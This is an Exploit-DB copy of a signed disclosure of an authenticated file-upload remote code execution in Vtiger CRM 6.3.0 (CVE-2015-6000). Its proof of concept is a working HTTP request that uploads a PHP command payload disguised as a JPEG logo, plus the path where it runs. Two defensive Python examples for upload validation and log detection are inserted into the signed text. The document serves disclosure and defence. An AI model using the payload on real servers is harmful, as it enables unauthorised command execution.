vTiger CRM 6.3.0 – (Authenticated) Remote Code Execution

Author: Benjamin Daniel Mussler
Date: 2015-09-28
Category:
Platform:
Source: https://www.exploit-db.com/exploits/38345/

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
    
    
# Exploit Title: Vtiger CRM <= 6.3.0 Authenticated Remote Code Execution
# Date: 2015-09-28
# Exploit Author: Benjamin Daniel Mussler
# Vendor Homepage: https://www.vtiger.com
# Software Link: https://www.vtiger.com/open-source-downloads/
# Version: 6.3.0 (and lower)
# Tested on: Linux (Ubuntu)
# CVE : CVE-2015-6000
# Source: http://b.fl7.de/2015/09/vtiger-crm-authenticated-rce-cve-2015-6000.html
    
    
=== Description ===

Vtiger CRM's administration interface allows for the upload of a company
logo. Instead of uploading an image, an attacker may choose to upload a
file containing PHP code and run this code by accessing the resulting
PHP file.

Detailed description:
http://b.fl7.de/2015/09/vtiger-crm-authenticated-rce-cve-2015-6000.html
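The weakness described above is an upload handler that trusts the client-supplied file name and the declared Content-Type. The following is an added example (not code from the advisory or from Vtiger) of the validation a logo upload should perform: an extension allowlist, a check of the file's leading bytes, agreement between the two, and a server-chosen name for the stored file. The function names, the reason strings and the size limit are this example's own assumptions.

```python
import os
import secrets

# Allowed logo types: extension -> magic-byte prefixes the content must start with.
# The Content-Type of a multipart part (the PoC sends "image/jpeg" for a PHP
# payload) is attacker-controlled, so it is deliberately not consulted.
ALLOWED_IMAGE_TYPES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# Hypothetical reason codes returned to the caller (assumed for this example).
REASON_OK = "ok"
REASON_EMPTY = "empty or oversized upload"
REASON_EXTENSION = "extension not in image allowlist"
REASON_CONTENT = "content does not start with a known image signature"
REASON_MISMATCH = "extension does not match detected image type"


def detect_image_type(data: bytes):
    """Return the image type implied by the leading bytes, or None."""
    for ext, magics in ALLOWED_IMAGE_TYPES.items():
        if any(data.startswith(m) for m in magics):
            return ext
    return None


def validate_logo_upload(filename: str, data: bytes, max_bytes: int = 512 * 1024):
    """Validate an uploaded logo. Returns (accepted, reason, stored_name).

    stored_name is chosen by the server; the client-supplied name is used only
    to read its extension and never becomes the name of the file on disk.
    """
    if not data or len(data) > max_bytes:
        return False, REASON_EMPTY, None

    # basename() discards directory components; splitext() takes the LAST
    # extension, so "logo.jpg.php" is judged by ".php" and rejected.
    ext = os.path.splitext(os.path.basename(filename))[1].lower().lstrip(".")
    if ext not in ALLOWED_IMAGE_TYPES:
        return False, REASON_EXTENSION, None

    detected = detect_image_type(data)
    if detected is None:
        return False, REASON_CONTENT, None

    # jpg and jpeg share a signature; any other disagreement is rejected.
    if detected != ext and {detected, ext} != {"jpg", "jpeg"}:
        return False, REASON_MISMATCH, None

    # Random server-side name carrying the detected (not the declared) extension.
    stored_name = "logo_%s.%s" % (secrets.token_hex(8), detected)
    return True, REASON_OK, stored_name


if __name__ == "__main__":
    # Constructed inputs: the advisory's payload shape versus a real PNG header.
    php_payload = b"<? system('id'); ?>"
    png_bytes = b"\x89PNG\r\n\x1a\n" + b"\x00" * 64
    for name, blob in [("2.php", php_payload), ("logo.jpg", php_payload),
                       ("logo.jpg.php", png_bytes), ("logo.png", png_bytes)]:
        print(name, validate_logo_upload(name, blob))
```

The extension check alone would not have stopped a PHP payload uploaded as `logo.jpg`; the signature check catches that case, and the server-chosen name removes any influence the client had over the path the file ends up at.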
    
    
=== PoC ===

Through a specially crafted HTTP-POST request, a PHP file is stored on
the server hosting the Vtiger CRM software:

POST /index.php HTTP/1.1
Host: [...]
Cookie: [...]
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------51732462825208
Content-Length: 2040

-----------------------------51732462825208
Content-Disposition: form-data; name="__vtrftk"

[...]
-----------------------------51732462825208
Content-Disposition: form-data; name="logo"; filename="2.php"
Content-Type: image/jpeg

<? system('id; uname -a; /sbin/ifconfig -a'); system('cat ../../vtigerversion.php'); ?>
-----------------------------51732462825208
Content-Disposition: form-data; name="address"
[...]
    
    
The resulting PHP file can then be accessed at

[Vtiger URL]/test/logo/2.php
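Because the uploaded file is fetched from a fixed directory under the web root, a request for a script file under `/test/logo/` is a usable detection signal for this issue. The following is an added example (not part of the advisory) that scans web-server access log lines in the common "combined" format for such requests; the log lines are constructed for the example, and the function names and the script-extension list are assumptions rather than anything the advisory specifies.

```python
import re
from os.path import splitext
from urllib.parse import urlsplit

# Upload directory from the advisory and the extensions a PHP-enabled web
# server would typically execute (assumed list; adjust to your server's config).
LOGO_DIR = "/test/logo/"
SCRIPT_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "phar"}

# Apache/Nginx "combined"-style access log line (leading fields only; any
# trailing referer/user-agent fields are ignored by match()).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log: a normal logo fetch plus two script requests.
SAMPLE_LOG = [
    '203.0.113.7 - - [28/Sep/2015:10:15:01 +0000] "POST /index.php HTTP/1.1" 200 5321',
    '203.0.113.7 - - [28/Sep/2015:10:15:03 +0000] "GET /test/logo/2.php HTTP/1.1" 200 412 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [28/Sep/2015:10:16:22 +0000] "GET /test/logo/logo.png HTTP/1.1" 200 8823',
    '203.0.113.7 - - [28/Sep/2015:10:17:40 +0000] "GET /test/logo/x.PHP HTTP/1.1" 404 210',
]


def parse_log_line(line: str):
    """Split one access-log line into its fields, or return None if malformed."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_script_under_logo_dir(target: str) -> bool:
    """True if the request path is a script file inside the logo directory."""
    path = urlsplit(target).path            # drop any query string or fragment
    if not path.startswith(LOGO_DIR):
        return False
    ext = splitext(path)[1].lower().lstrip(".")  # case-insensitive extension
    return ext in SCRIPT_EXTENSIONS


def find_logo_script_requests(lines):
    """Return one record per request that hits a script under the logo directory.

    A 404 still counts: it shows someone probing the path even if no file exists.
    """
    hits = []
    for line in lines:
        rec = parse_log_line(line)
        if rec and is_script_under_logo_dir(rec["target"]):
            hits.append({
                "ip": rec["ip"],
                "ts": rec["ts"],
                "path": urlsplit(rec["target"]).path,
                "status": int(rec["status"]),
            })
    return hits


if __name__ == "__main__":
    for hit in find_logo_script_requests(SAMPLE_LOG):
        print("%(ts)s %(ip)s %(path)s -> %(status)d" % hit)
```

A 200 response to such a request is the stronger signal (the file existed and was served); a 404 is still worth alerting on, since the logo directory should never legitimately receive requests for script files. Read the log lines from your server's access log in place of `SAMPLE_LOG` when using this for real.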
- --
Benjamin Daniel MUSSLER

Ix-Xgħajra, Malta Tel (MT) +356 9965 3798
Karlsruhe, Germany Tel (DE) +49 721 989 0150
Web: https://FL7.DE PGP: https://FL7.DE/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.21 (MingW32)

iQIcBAEBAgAGBQJWCVaeAAoJEAg0a3ng3v4f108P/0u+CUuUKSsSFiQt4S/HVAnw
5ykzNoZ/T1v0LUrItI1bZPeTyRr6VUandYclg68OM3VY0zc4x9161ScSlcnIitVO
AasvEw7mGguAR4Pe2i84LpPNvE6Bi+MJqU6vnBqZVmQMXUY8k+Mb0ufM/DMByLPj
dcozrAgI9ZQC3pnWiOPigD+gHe/AxY3Z1cxQLluOqBmMf7f3JXC+1dZt91EScuyi
lHNtd6/uRtHJKqBG8MZMXnq49OxTk7iiqQmb393RizPL0eI8FumwaCXTDnLgRwX3
7XQfmg3sCzT1jPSQB4/UYciePPOS4EREjDA/RW5ydtGRCkZPvmjUlfaFMwTjlCd1
dpRIRlzDBWUCVFIqkp2TGkrkbckA1hnehH1q64sQ4KopdKl0tPJ8yLumVr2Uvwtq
iLAbhQcn6+Cr9gctzOlrbj7BqY9uC0HfVdsl1qOCN5v3Yrbq7h/ToPnKGACLQN7t
sALb61+vvriPimTVZD3AQg9t82G1brPHMzp+cLwjhYtw8b+2rohAA0JoUgBsCUHG
8dgnHI1K514soGkCDB4Mk2oM5W8T2tMsxvX/iQDH45IL3hYrROnWUnW+Fd3hA3ks
VsqaNpaDEm+allop6OH3PETs6rGsLyaspCJBdkqKqxNOS6XE+lScrBVxzNL4VJL2
i8fbvZ/RIkuBT0Z79hUV
=gMXq
-----END PGP SIGNATURE-----